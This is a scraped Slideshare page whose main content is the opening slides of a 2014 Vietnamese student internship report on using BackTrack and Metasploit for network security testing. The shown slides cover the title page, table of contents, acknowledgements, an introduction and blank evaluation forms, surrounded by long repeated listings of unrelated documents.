Các Nhân Tố Tác Động Đến Áp Dụng Chuẩn Mực Kế Toán Quốc Tế IasIfrs
 
ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT...
 ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT... ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT...
ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT...
 
Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...
Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...
Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...
 
Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...
Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...
Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...
 
Nghiên cứu quy trình sản xuất natto từ đậu nành việt nam
Nghiên cứu quy trình sản xuất natto từ đậu nành việt namNghiên cứu quy trình sản xuất natto từ đậu nành việt nam
Nghiên cứu quy trình sản xuất natto từ đậu nành việt nam
 
Luận Văn Sự Ảnh Hưởng Của Trách Nhiệm Xã Hội Doanh Nghiệp Đến Sự An Tâm Trong...
Luận Văn Sự Ảnh Hưởng Của Trách Nhiệm Xã Hội Doanh Nghiệp Đến Sự An Tâm Trong...Luận Văn Sự Ảnh Hưởng Của Trách Nhiệm Xã Hội Doanh Nghiệp Đến Sự An Tâm Trong...
Luận Văn Sự Ảnh Hưởng Của Trách Nhiệm Xã Hội Doanh Nghiệp Đến Sự An Tâm Trong...
 
Luận văn: Mô hình hóa luồng tương tác ifml trong phát triển di động
Luận văn: Mô hình hóa luồng tương tác ifml trong phát triển di độngLuận văn: Mô hình hóa luồng tương tác ifml trong phát triển di động
Luận văn: Mô hình hóa luồng tương tác ifml trong phát triển di động
 

Dernier

Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfhoangtuansinh1
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...hoangtuansinh1
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngYhoccongdong.com
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢImyvh40253
 
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảoKiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảohoanhv296
 
CD21 Exercise 2.1 KEY.docx tieng anh cho
CD21 Exercise 2.1 KEY.docx tieng anh choCD21 Exercise 2.1 KEY.docx tieng anh cho
CD21 Exercise 2.1 KEY.docx tieng anh chonamc250
 
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIGIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIĐiện Lạnh Bách Khoa Hà Nội
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...Nguyen Thanh Tu Collection
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-KhnhHuyn546843
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdfTrnHoa46
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...Nguyen Thanh Tu Collection
 
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptxNhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptxhoangvubaongoc112011
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docxTHAO316680
 
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIĐiện Lạnh Bách Khoa Hà Nội
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhdtlnnm
 

Dernier (20)

Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
 
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảoKiểm tra cuối học kì 1 sinh học 12 đề tham khảo
Kiểm tra cuối học kì 1 sinh học 12 đề tham khảo
 
CD21 Exercise 2.1 KEY.docx tieng anh cho
CD21 Exercise 2.1 KEY.docx tieng anh choCD21 Exercise 2.1 KEY.docx tieng anh cho
CD21 Exercise 2.1 KEY.docx tieng anh cho
 
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIGIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
 
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdf
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
 
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptxNhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
 
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
 

Báo cáo cuối kỳ Athena - Report

  • 1. ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Đề tài: Nghiên cứu và sử dụng các chức năng của backtrack để kiểm tra an ninh mạng GVHD: Thầy VÕ ĐỖ THẮNG Sinh viên thực hiện: Phạm Minh Đạt – 51100753 Dương Thế Hiển - 51101153 Thành phố Hồ Chí Minh, ngày 11 tháng 08 năm 2014
  • 2. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 1 NỘI DUNG BÀI BÁO CÁO LỜI CAM ĐOAN....................................................................................................................................................................................................................................2 LỜI CẢM ƠN TRUNG TÂM..............................................................................................................................................................................................................3 LỜI CẢM ƠN KHOA............................................................................................................................................................................................................................4 LỜI MỞ ĐẦU.........................................................................................................................................................................................................................................5 NHẬN XÉT CỦA CÔNG TY THỰC TẬP .......................................................................................................................................................................................6 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN...............................................................................................................................................................................7 GIỚI THIÊU VỀ CÔNG TY THỰC TẬP.........................................................................................................................................................................................8 Các cơ sở ............................................................................................................................................................................................................................................8 Cơ sở 1: Tại TP Hồ Chí Minh:................................................................................................................................................................................................8 Cơ sở 2: Tại TP Hồ Chí Minh:................................................................................................................................................................................................8 Lĩnh vực hoạt động........................................................................................................................................................................................................................8 Đội ngũ giảng viên .........................................................................................................................................................................................................................9 NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP ......................................................................................................................................................10 Footprinting ...................................................................................................................................................................................................................................10 Cở sở lý thuyết ..........................................................................................................................................................................................................................10 Cách thực hiện...........................................................................................................................................................................................................................10 Network Scanning .......................................................................................................................................................................................................................12 Cơ sở lý thuyết ..........................................................................................................................................................................................................................12 Cách thực hiện...........................................................................................................................................................................................................................13 Enumeration ..................................................................................................................................................................................................................................13 Cơ sở lý thuyết ..........................................................................................................................................................................................................................13 Cách thực hiện...........................................................................................................................................................................................................................13 Giới thiệu VMWare Workstation...........................................................................................................................................................................................15 Hệ điều hành BackTrack5 R3 .................................................................................................................................................................................................15 Giới thiệu Backtrack5 R3......................................................................................................................................................................................................15 Cài đặt Backtrack5 R3 trên VMWare ..............................................................................................................................................................................16 Công cụ Metasploit......................................................................................................................................................................................................................22 Giới thiệu Metasploit..............................................................................................................................................................................................................22 Các thành phần của Metasploit..........................................................................................................................................................................................22 Sử dụng Metasploit framework.........................................................................................................................................................................................22 Payload meterpreter..............................................................................................................................................................................................................23 Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost..........................................................................................................................24 Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7..............................................................................................................24 Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010.........................................................................................................................................28 Khai thác lỗi của Adobe Reader.........................................................................................................................................................................................29 Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP...............................................................................................................32 Tấn công qua mạng Internet, triển khai trên VPS .........................................................................................................................................................34 VPS là gì........................................................................................................................................................................................................................................34 Đặc điểm VPS.............................................................................................................................................................................................................................34 Giá trị sử dụng của VPS .........................................................................................................................................................................................................34 Khai thác thông qua VPS.......................................................................................................................................................................................................34 KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP...........................................................................................................................................................35 TÀI LIỆU THAM KHẢO...................................................................................................................................................................................................................36
  • 3. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 2 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển LỜI CAM ĐOAN Tôi xin cam đoan:  Những nội dung trong bài báo cáo này là do tôi thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng.  Mọi tham khảo trong báo cáo này đều được trích dẫn rõ ràng tác giả, tên công trình, thời gian, địa điểm công bố.  Mọi sao chép không hợp lệ, vi phạm qui chế đào tạo, hay gian lận nhóm xin hoàn toàn chịu trách nhiệm. Các bài báo cáo hàng tuần và các video clip: Dương Thế Hiển – 51101153  Tuần 1: http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-1 https://www.youtube.com/watch?v=yPISuQIlOpM  Tuần 2: http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-2 https://www.youtube.com/watch?v=_7GrYn_zqtI&feature=youtu.be  Tuần 3: http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-3 https://www.youtube.com/watch?v=gJdtkKWmTuc  Clip giới thiệu cá nhân https://www.youtube.com/watch?v=R02WiuE_tEI&feature=youtu.be Phạm Minh Đạt – 51100753  Clip giới thiệu và các bài báo cáo http://tinyurl.com/baocaoathena Video clip cuối kỳ https://www.youtube.com/watch?v=eMblYurER_Q TPHCM ngày 11 tháng 08 năm 2014 Nhóm sinh viên thực hiện Phạm Minh Đạt Dương Thế Hiển
  • 4. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 3 LỜI CẢM ƠN TRUNG TÂM Tôi xin cảm ơn giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena, cùng các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Võ Đỗ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian TTCN2. Đã tạo điều kiện cũng như kiến thức trong suốt thời thời gian thực tập, đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo. Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ thực tập sắp tới. Một lần nữa tôi xin chân thành cảm ơn. TPHCM ngày 11 tháng 08 năm 2014 Nhóm sinh viên thực hiện Phạm Minh Đạt Dương Thế Hiển
  • 5. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 4 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển LỜI CẢM ƠN KHOA Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa tp.HCM và khoa Khoa Học và Kỹ Thuật Máy Tính đã tạo điều kiện cho tôi hoàn thành tốt đợt TTCN 2 này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này. Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ thực tập sắp tới. Một lần nữa tôi xin chân thành cảm ơn. TPHCM ngày 11 tháng 08 năm 2014 Nhóm sinh viên thực hiện Phạm Minh Đạt Dương Thế Hiển
  • 6. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 5 LỜI MỞ ĐẦU Theo xu hướng phát triển như hiện nay, máy tính cũng như thiết bị thông minh phát triển ngày càng mạnh trên nền hệ thống mạng Internet. Thế nên, vấn đề bảo mật thông tin, an ninh mạng càng được chú trọng nhiều hơn. Hiện nay, các giao dịch ngân hàng, mua bán qua mạng được thực hiện hàng ngày, hàng giờ thông qua Internet, và các tài khoản ngân hàng là mục tiêu được các tin tặc nhắm đến. Tuy nhiên, vẫn ít có cá nhân hoặc doanh nghiệp nào chủ động phòng tránh việc này. Đó là lý do nhóm quyết định tham gia nghiên cứu đề tài này – “Nghiên cứu và sử dụng các công cụ của BackTrack để nghiên cứu an ninh mạng” – để có thể chủ động phòng tránh những khai thác đến từ tin tặc và có thể giúp đỡ người khác, các doanh nghiệp chủ động phòng tránh trước các nguy cơ mất mác do tin tặc gây ra. TPHCM ngày 11 tháng 08 năm 2014 Nhóm sinh viên thực hiện Phạm Minh Đạt Dương Thế Hiển
  • 7. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 6 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển NHẬN XÉT CỦA CÔNG TY THỰC TẬP .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. TPHCM, ngày …. tháng … năm 20.. Giám đốc trung tâm
  • 8. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 7 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. 